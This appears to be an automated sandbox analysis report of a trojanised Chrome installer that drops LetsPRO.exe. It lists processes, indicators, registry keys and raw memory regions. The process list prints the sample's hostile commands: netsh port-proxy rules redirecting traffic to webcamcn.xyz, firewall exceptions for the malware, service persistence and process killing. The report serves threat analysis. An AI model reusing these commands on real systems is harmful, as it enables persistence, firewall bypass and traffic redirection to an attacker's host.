C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Windows\System32\cscript.exe
cscript C:\Users\user\99944\144977.vbs
malicious
C:\Windows\System32\cscript.exe
cscript C:\Users\user\99944\144977.vbs
malicious
C:\Windows\System32\netsh.exe
netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
malicious
C:\Windows\System32\netsh.exe
netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
malicious
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi"
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774
C:\Windows\System32\cmd.exe
cmd /c cscript C:\Users\user\99944\144977.vbs
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe cscript C:\Users\user\99944\144977.vbs
C:\Windows\System32\sc.exe
sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144
C:\Windows\System32\taskkill.exe
taskkill /f /t /im wegame.exe
C:\Windows\System32\taskkill.exe
taskkill /f /t /im WeGame.exe
There are 35 more processes that are not shown.

URLs

Name
IP
Malicious
https://dl.google.com/update2/installers/icons/https://m.google.com/devicemanagement/data/apiLastCod
unknown
https://www.google.com/support/installer/?
unknown
https://m.google.com/devicemanagement/data/api
unknown

Domains

Name
IP
Malicious
156.248.54.11.webcamcn.xyz
156.248.54.11
malicious

IPs

IP
Domain
Country
Malicious
156.248.54.11
156.248.54.11.webcamcn.xyz
Seychelles
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\5bb04c.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\5bb04c.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\3AB66307F01A76C4CAA8D4EFB52E7DDF
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\C04682BDF1968B246A5146D4AC20303A
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\1F595A8DDA9436C4DB85595E479F9726
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\E597F4AAB76E519408301F451809CE15
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\39817EE0E90E1F740BB90F2F4AD09E34
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Program Files (x86)\WeGame\
HKEY_CURRENT_USER\SOFTWARE\Google\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}
AI_INSTALLPERUSER
HKEY_CURRENT_USER\SOFTWARE\Caphyon\Advanced Installer\Scheduled Tasks\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}
Update
HKEY_CURRENT_USER\SOFTWARE\Caphyon\Advanced Installer\Scheduled Tasks\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}
Update_ID
HKEY_CURRENT_USER\Console\0
d33f351a4aeea5e608853d1a56661059
HKEY_LOCAL_MACHINE\SOFTWARE
IpDates_info
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}
iid
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
uid
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
uid-create-time
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
uid-num-rotations
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\uid
7PS7Vw3J
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\PersistedPings\{34E166A1-9B3F-4B28-9586-72492EFE553B}
PersistedPingString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\PersistedPings\{34E166A1-9B3F-4B28-9586-72492EFE553B}
PersistedPingTime
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}
pv
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}
name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}
pv
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
*/443
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
*/80

Memdumps

Base Address
Regiontype
Protect
Malicious
10020000
direct allocation
page read and write
malicious
page read and write
8C4000
stack
page read and write
10000
unkown
page readonly
3AF0000
direct allocation
page read and write
4E8E000
heap
page read and write
5023000
heap
page read and write
1FF0000
heap
page read and write
40AE000
stack
page read and write
BA5000
heap
page read and write
660000
heap
page read and write
250000
unkown
page readonly
292E000
stack
page read and write
3360000
remote allocation
page read and write
3DAF000
stack
page read and write
614000
heap
page read and write
13F0000
heap
page read and write
10094000
direct allocation
page read and write
5185000
heap
page read and write
19D000
stack
page read and write
10000000
direct allocation
page read and write
51E000
stack
page read and write
6C8F1000
unkown
page execute read
608E000
heap
page read and write
26B0000
direct allocation
page read and write
416E000
stack
page read and write
26A0000
direct allocation
page read and write
AC9000
heap
page read and write
BAF000
heap
page read and write
26D000
unkown
page readonly
2201000
heap
page read and write
766000
heap
page read and write
FAE000
stack
page read and write
584000
heap
page read and write
630000
heap
page read and write
BB8000
heap
page read and write
710000
heap
page read and write
BB1000
heap
page read and write
26D000
unkown
page readonly
6CE62000
unkown
page read and write
BC8000
heap
page read and write
2059000
heap
page read and write
4FB1000
heap
page read and write
5510000
trusted library allocation
page read and write
AA8000
heap
page read and write
62A000
heap
page read and write
530000
heap
page read and write
26D000
unkown
page readonly
5F10000
heap
page read and write
490000
heap
page read and write
5510000
trusted library allocation
page read and write
BA5000
heap
page read and write
400000
unkown
page readonly
24C0000
heap
page read and write
1FF1000
heap
page read and write
BC8000
heap
page read and write
BA9000
heap
page read and write
26E0000
trusted library allocation
page read and write
1E4000
heap
page read and write
2041000
heap
page read and write
564000
heap
page read and write
CAC000
stack
page read and write
BB4000
heap
page read and write
E7B000
heap
page read and write
138F8E94000
heap
page read and write
400000
unkown
page readonly
BA5000
heap
page read and write
78E000
heap
page read and write
5510000
trusted library allocation
page read and write
2059000
heap
page read and write
450000
heap
page read and write
6C8F1000
unkown
page execute read
251000
unkown
page execute read
3AF0000
direct allocation
page read and write
26E0000
trusted library allocation
page read and write
6C9A4000
unkown
page read and write
1006B000
direct allocation
page execute read
44E000
stack
page read and write
BC4000
heap
page read and write
BC4000
heap
page read and write
B63000
heap
page read and write
2041000
heap
page read and write
402000
unkown
page readonly
6C9A4000
unkown
page read and write
BC4000
heap
page read and write
4A4000
heap
page read and write
BC4000
heap
page read and write
138F96E0000
heap
page read and write
20A0000
heap
page read and write
450000
heap
page read and write
BAF000
heap
page read and write
6C9A6000
unkown
page write copy
5510000
trusted library allocation
page read and write
BB4000
heap
page read and write
BC4000
heap
page read and write
26B0000
direct allocation
page read and write
1B76F3F0000
heap
page read and write
BC3000
heap
page read and write
2130000
heap
page read and write
138F8C90000
heap
page read and write
402000
unkown
page readonly
22D0000
heap
page read and write
2042000
heap
page read and write
BAF000
heap
page read and write
1F0000
heap
page read and write
6AE000
stack
page read and write
2041000
heap
page read and write
280000
unkown
page readonly
690000
heap
page read and write
26D000
unkown
page readonly
2041000
heap
page read and write
5096000
heap
page read and write
21F0000
heap
page read and write
10000000
direct allocation
page read and write
1010000
heap
page read and write
BBA000
heap
page read and write
640000
heap
page read and write
402000
unkown
page readonly
136000
unkown
page write copy
4F2E000
heap
page read and write
4B0000
heap
page read and write
1F80000
heap
page read and write
BC8000
heap
page read and write
154F000
stack
page read and write
BC8000
heap
page read and write
10001000
direct allocation
page execute read
5510000
trusted library allocation
page read and write
2041000
heap
page read and write
64B000
heap
page read and write
64B000
heap
page read and write
401000
unkown
page execute read
BAF000
heap
page read and write
4A4000
heap
page read and write
280000
unkown
page readonly
BB4000
heap
page read and write
2724000
heap
page read and write
400000
unkown
page readonly
10001000
direct allocation
page execute read
2080000
trusted library allocation
page read and write
25C1000
direct allocation
page execute read
BC8000
heap
page read and write
BAF000
heap
page read and write
28A4000
heap
page read and write
138F8E94000
heap
page read and write
9B000
stack
page read and write
520000
heap
page read and write
401000
unkown
page execute read
2041000
heap
page read and write
401000
unkown
page execute read
120000
unkown
page readonly
5F11000
heap
page read and write
27D000
unkown
page read and write
2041000
heap
page read and write
6C9A6000
unkown
page write copy
19D000
stack
page read and write
BA2000
heap
page read and write
BC8000
heap
page read and write
B52000
heap
page read and write
5AE000
heap
page read and write
2041000
heap
page read and write
251000
unkown
page execute read
1410000
heap
page read and write
5510000
trusted library allocation
page read and write
2041000
heap
page read and write
1300000
heap
page read and write
2041000
heap
page read and write
39B0000
direct allocation
page read and write
BC3000
heap
page read and write
BB1000
heap
page read and write
37F0000
trusted library allocation
page read and write
1001E000
direct allocation
page readonly
BAF000
heap
page read and write
3AF0000
direct allocation
page read and write
BC3000
heap
page read and write
2059000
heap
page read and write
B5A000
heap
page read and write
29A0000
direct allocation
page read and write
BC6000
heap
page read and write
61B000
heap
page read and write
5F10000
heap
page read and write
5023000
heap
page read and write
401000
unkown
page execute read
26A0000
direct allocation
page read and write
6C8F1000
unkown
page execute read
2041000
heap
page read and write
626000
heap
page read and write
26D000
unkown
page readonly
4F8D000
heap
page read and write
1E4000
heap
page read and write
2041000
heap
page read and write
4F81000
heap
page read and write
39B0000
direct allocation
page read and write
400000
unkown
page readonly
BB1000
heap
page read and write
26C0000
heap
page read and write
37F0000
trusted library allocation
page read and write
617000
heap
page read and write
21C0000
heap
page read and write
5510000
trusted library allocation
page read and write
474000
heap
page read and write
5510000
trusted library allocation
page read and write
401000
unkown
page execute read
BAC000
heap
page read and write
4F6E000
heap
page read and write
BA5000
heap
page read and write
BAC000
heap
page read and write
37F0000
trusted library allocation
page read and write
107C000
stack
page read and write
138F8E96000
heap
page read and write
2059000
heap
page read and write
BB4000
heap
page read and write
28AE000
stack
page read and write
BA5000
heap
page read and write
138F8E98000
heap
page read and write
6C9A6000
unkown
page write copy
2041000
heap
page read and write
BB4000
heap
page read and write
33C000
stack
page read and write
6FC000
stack
page read and write
6C8F0000
unkown
page readonly
2041000
heap
page read and write
2059000
heap
page read and write
2180000
direct allocation
page read and write
900000
heap
page read and write
26A0000
direct allocation
page read and write
138F8E97000
heap
page read and write
1E0000
heap
page read and write
320E000
stack
page read and write
BB8000
heap
page read and write
26D000
unkown
page readonly
113CA62C000
heap
page read and write
2059000
heap
page read and write
120E000
stack
page read and write
F50000
heap
page read and write
65F000
stack
page read and write
554000
heap
page read and write
6CC90000
unkown
page readonly
564F000
stack
page read and write
26D000
unkown
page readonly
BB8000
heap
page read and write
1009A000
direct allocation
page execute read
1006B000
direct allocation
page execute read
251000
unkown
page execute read
B4D000
heap
page read and write
37F0000
trusted library allocation
page read and write
BA5000
heap
page read and write
26A0000
direct allocation
page read and write
4F80000
heap
page read and write
4A4000
heap
page read and write
26E0000
trusted library allocation
page read and write
1F0000
heap
page read and write
5510000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
4F2E000
heap
page read and write
401000
unkown
page execute read
BC8000
heap
page read and write
138F8D70000
heap
page read and write
121000
unkown
page execute read
4B4000
heap
page read and write
19D000
stack
page read and write
BC3000
heap
page read and write
26E0000
trusted library allocation
page read and write
2041000
heap
page read and write
2045000
heap
page read and write
250000
unkown
page readonly
5981000
heap
page read and write
25D9000
direct allocation
page read and write
167F000
stack
page read and write
5510000
trusted library allocation
page read and write
450000
heap
page read and write
4F61000
heap
page read and write
1001E000
direct allocation
page readonly
1FE1000
heap
page read and write
BC8000
heap
page read and write
27D000
unkown
page read and write
73B000
heap
page read and write
26E0000
trusted library allocation
page read and write
5E7000
heap
page read and write
BC3000
heap
page read and write
2059000
heap
page read and write
280000
unkown
page readonly
4F81000
heap
page read and write
401000
unkown
page execute read
4E80000
heap
page read and write
584000
heap
page read and write
4D0000
heap
page read and write
401000
unkown
page execute read
BAF000
heap
page read and write
25F0000
direct allocation
page execute and read and write
2041000
heap
page read and write
2180000
direct allocation
page read and write
5510000
trusted library allocation
page read and write
1F0000
heap
page read and write
402000
unkown
page readonly
6C9A9000
unkown
page readonly
2059000
heap
page read and write
2041000
heap
page read and write
4F2E000
heap
page read and write
B87000
heap
page read and write
5510000
trusted library allocation
page read and write
1001E000
direct allocation
page readonly
BC3000
heap
page read and write
580000
trusted library allocation
page read and write
710000
heap
page read and write
5510000
trusted library allocation
page read and write
BAF000
heap
page read and write
24B3000
heap
page read and write
450000
heap
page read and write
BB4000
heap
page read and write
2041000
heap
page read and write
5510000
trusted library allocation
page read and write
144A000
heap
page read and write
113CA650000
heap
page read and write
26D000
unkown
page readonly
1FC9000
heap
page read and write
BB8000
heap
page read and write
412D000
stack
page read and write
39B0000
direct allocation
page read and write
8CF000
stack
page read and write
544000
heap
page read and write
BB8000
heap
page read and write
20F0000
trusted library allocation
page read and write
68E000
stack
page read and write
4B4000
heap
page read and write
113CA62B000
heap
page read and write
BA5000
heap
page read and write
BC3000
heap
page read and write
113CA60B000
heap
page read and write
BC4000
heap
page read and write
BC4000
heap
page read and write
614000
heap
page read and write
4EC0000
heap
page read and write
10001000
direct allocation
page execute read
138F8E73000
heap
page read and write
10094000
direct allocation
page read and write
1FE0000
heap
page read and write
BAF000
heap
page read and write
BC4000
heap
page read and write
400000
unkown
page readonly
BB4000
heap
page read and write
5510000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
BC3000
heap
page read and write
6FD000
stack
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
402000
unkown
page readonly
2059000
heap
page read and write
740000
heap
page read and write
21D0000
heap
page read and write
138F8E60000
heap
page read and write
136E000
stack
page read and write
BC4000
heap
page read and write
5510000
trusted library allocation
page read and write
2059000
heap
page read and write
600000
heap
page read and write
BC3000
heap
page read and write
BB4000
heap
page read and write
3AC0000
direct allocation
page execute and read and write
14EF000
stack
page read and write
BC4000
heap
page read and write
2041000
heap
page read and write
113CA654000
heap
page read and write
BB1000
heap
page read and write
BC4000
heap
page read and write
520000
heap
page read and write
BB8000
heap
page read and write
33BF000
stack
page read and write
BB8000
heap
page read and write
10094000
direct allocation
page read and write
BC3000
heap
page read and write
3DE000
stack
page read and write
629000
heap
page read and write
26E0000
trusted library allocation
page read and write
5911000
heap
page read and write
BC8000
heap
page read and write
2041000
heap
page read and write
BC8000
heap
page read and write
250000
unkown
page readonly
BAF000
heap
page read and write
BAF000
heap
page read and write
2041000
heap
page read and write
12FC000
stack
page read and write
ACA000
heap
page read and write
550000
heap
page read and write
2041000
heap
page read and write
564000
heap
page read and write
1FD1000
heap
page read and write
6C8F0000
unkown
page readonly
138F8E8E000
heap
page read and write
602000
heap
page read and write
BB1000
heap
page read and write
44E000
stack
page read and write
5194000
heap
page read and write
6C8F1000
unkown
page execute read
25E0000
direct allocation
page read and write
400000
unkown
page readonly
BC4000
heap
page read and write
1B76F4D0000
heap
page read and write
59A000
heap
page read and write
590000
trusted library allocation
page read and write
BA5000
heap
page read and write
B45000
heap
page read and write
251000
unkown
page execute read
44E000
stack
page read and write
26E0000
trusted library allocation
page read and write
2041000
heap
page read and write
401000
unkown
page execute read
8FC000
stack
page read and write
10000000
direct allocation
page read and write
2041000
heap
page read and write
B87000
heap
page read and write
10094000
direct allocation
page read and write
BC8000
heap
page read and write
10630000
direct allocation
page read and write
231E000
stack
page read and write
6C9A4000
unkown
page read and write
509D000
heap
page read and write
2041000
heap
page read and write
4E8A000
heap
page read and write
2070000
heap
page read and write
40EC000
stack
page read and write
57FD000
heap
page read and write
9B000
stack
page read and write
6C8F1000
unkown
page execute read
1F01000
heap
page read and write
5AC000
stack
page read and write
BC3000
heap
page read and write
26E0000
trusted library allocation
page read and write
AA0000
heap
page read and write
21CE000
stack
page read and write
2C7F000
stack
page read and write
BB8000
heap
page read and write
BB8000
heap
page read and write
2160000
heap
page read and write
10630000
direct allocation
page read and write
BA5000
heap
page read and write
400000
unkown
page readonly
2059000
heap
page read and write
BB8000
heap
page read and write
1F31000
heap
page read and write
113CA9A0000
heap
page read and write
BB4000
heap
page read and write
5185000
heap
page read and write
BB8000
heap
page read and write
BA5000
heap
page read and write
20C0000
heap
page read and write
401000
unkown
page execute read
4E4000
heap
page read and write
BA5000
heap
page read and write
26F0CFE000
stack
page read and write
550000
heap
page read and write
BB8000
heap
page read and write
BB4000
heap
page read and write
1FE1000
heap
page read and write
6082000
heap
page read and write
BC3000
heap
page read and write
341F000
stack
page read and write
B5C000
heap
page read and write
BA9000
heap
page read and write
5E5000
heap
page read and write
26D000
unkown
page readonly
2059000
heap
page read and write
1009A000
direct allocation
page execute read
B8D000
heap
page read and write
BAF000
heap
page read and write
BC3000
heap
page read and write
1EFC000
heap
page read and write
DAC000
stack
page read and write
26D000
unkown
page readonly
4E4000
heap
page read and write
2059000
heap
page read and write
280000
unkown
page readonly
BAF000
heap
page read and write
37F0000
trusted library allocation
page read and write
4B4000
heap
page read and write
BB8000
heap
page read and write
4AE000
stack
page read and write
400000
unkown
page readonly
460000
heap
page read and write
2F01000
heap
page read and write
2070000
heap
page read and write
136000
unkown
page read and write
9B000
stack
page read and write
138F8E60000
heap
page read and write
BC8000
heap
page read and write
540000
heap
page read and write
73A000
heap
page read and write
BAC000
heap
page read and write
3380000
heap
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
10001000
direct allocation
page execute read
12FE000
stack
page read and write
256F000
stack
page read and write
117C000
stack
page read and write
21C0000
heap
page read and write
401000
unkown
page execute read
8A0000
heap
page read and write
7F0000
heap
page read and write
450E000
stack
page read and write
4B4000
heap
page read and write
2180000
direct allocation
page read and write
1EF0000
heap
page read and write
5911000
heap
page read and write
33CF000
stack
page read and write
B57000
heap
page read and write
2180000
direct allocation
page read and write
402000
unkown
page readonly
2059000
heap
page read and write
10001000
direct allocation
page execute read
10001000
direct allocation
page execute read
584000
heap
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
5FE000
heap
page read and write
2041000
heap
page read and write
615000
heap
page read and write
1F0000
heap
page read and write
94E000
stack
page read and write
BB8000
heap
page read and write
401000
unkown
page execute read
BA5000
heap
page read and write
37F0000
trusted library allocation
page read and write
1E4000
heap
page read and write
3420000
direct allocation
page read and write
400000
unkown
page readonly
BAF000
heap
page read and write
2041000
heap
page read and write
26D000
unkown
page readonly
1E4000
heap
page read and write
1F01000
heap
page read and write
6C9A9000
unkown
page readonly
50CB000
heap
page read and write
BB8000
heap
page read and write
138F8E9F000
heap
page read and write
BC4000
heap
page read and write
BAF000
heap
page read and write
5510000
trusted library allocation
page read and write
138F8EA3000
heap
page read and write
2041000
heap
page read and write
5082000
heap
page read and write
152E000
stack
page read and write
2041000
heap
page read and write
37F0000
trusted library allocation
page read and write
9B000
stack
page read and write
3790000
trusted library allocation
page read and write
2041000
heap
page read and write
3420000
direct allocation
page read and write
3170000
heap
page read and write
BB8000
heap
page read and write
BB8000
heap
page read and write
474000
heap
page read and write
10001000
direct allocation
page execute read
10DA000
heap
page read and write
1F40000
trusted library allocation
page read and write
400000
unkown
page readonly
BB8000
heap
page read and write
4A4000
heap
page read and write
BAF000
heap
page read and write
9C000
stack
page read and write
BA5000
heap
page read and write
BB4000
heap
page read and write
BB4000
heap
page read and write
BAC000
heap
page read and write
BB8000
heap
page read and write
400000
unkown
page readonly
1FE1000
heap
page read and write
2041000
heap
page read and write
BB1000
heap
page read and write
2147000
heap
page read and write
37F0000
trusted library allocation
page read and write
3BB0000
heap
page read and write
27D000
unkown
page write copy
25DF000
direct allocation
page readonly
280000
unkown
page readonly
608E000
heap
page read and write
2041000
heap
page read and write
BA5000
heap
page read and write
402000
unkown
page readonly
5F9000
heap
page read and write
5B0000
heap
page read and write
DD0000
heap
page read and write
BA5000
heap
page read and write
6DF000
stack
page read and write
280000
unkown
page readonly
BA5000
heap
page read and write
27D000
unkown
page write copy
2949000
heap
page read and write
5510000
trusted library allocation
page read and write
BAF000
heap
page read and write
2059000
heap
page read and write
334E000
stack
page read and write
BAF000
heap
page read and write
BC4000
heap
page read and write
4B4000
heap
page read and write
402000
unkown
page readonly
26E0000
trusted library allocation
page read and write
3BE000
stack
page read and write
2059000
heap
page read and write
334F000
stack
page read and write
2041000
heap
page read and write
2059000
heap
page read and write
2041000
heap
page read and write
401000
unkown
page execute read
BB8000
heap
page read and write
339F000
stack
page read and write
62F000
stack
page read and write
105E000
stack
page read and write
37F0000
trusted library allocation
page read and write
614000
heap
page read and write
2041000
heap
page read and write
3A40000
direct allocation
page execute and read and write
2059000
heap
page read and write
BC3000
heap
page read and write
BC8000
heap
page read and write
2041000
heap
page read and write
10000000
direct allocation
page read and write
614000
heap
page read and write
402000
unkown
page readonly
29E6000
heap
page read and write
3BF0000
heap
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
720000
heap
page read and write
5023000
heap
page read and write
400000
unkown
page readonly
402000
unkown
page readonly
3190000
heap
page read and write
1006B000
direct allocation
page execute read
400000
unkown
page readonly
BB8000
heap
page read and write
6C9A9000
unkown
page readonly
26E0000
trusted library allocation
page read and write
554E000
stack
page read and write
10000000
direct allocation
page read and write
400000
unkown
page readonly
39B0000
direct allocation
page read and write
10630000
direct allocation
page read and write
2F4F000
heap
page read and write
1001E000
direct allocation
page readonly
61D000
heap
page read and write
440E000
stack
page read and write
BB8000
heap
page read and write
208D000
heap
page read and write
113CA61A000
heap
page read and write
61F000
heap
page read and write
2059000
heap
page read and write
1470000
heap
page read and write
5EC000
heap
page read and write
37EE000
unkown
page read and write
628000
heap
page read and write
37F0000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
251000
unkown
page execute read
113CA619000
heap
page read and write
2041000
heap
page read and write
2059000
heap
page read and write
591D000
heap
page read and write
250000
unkown
page readonly
26D000
unkown
page readonly
27D000
unkown
page read and write
568C000
stack
page read and write
5802000
heap
page read and write
BB8000
heap
page read and write
6C8F1000
unkown
page execute read
400000
unkown
page readonly
509D000
heap
page read and write
564000
heap
page read and write
BAF000
heap
page read and write
5096000
heap
page read and write
1020000
heap
page read and write
BAF000
heap
page read and write
B28000
heap
page read and write
BC3000
heap
page read and write
1F0000
heap
page read and write
3FAE000
stack
page read and write
10094000
direct allocation
page read and write
3AF0000
direct allocation
page read and write
BC8000
heap
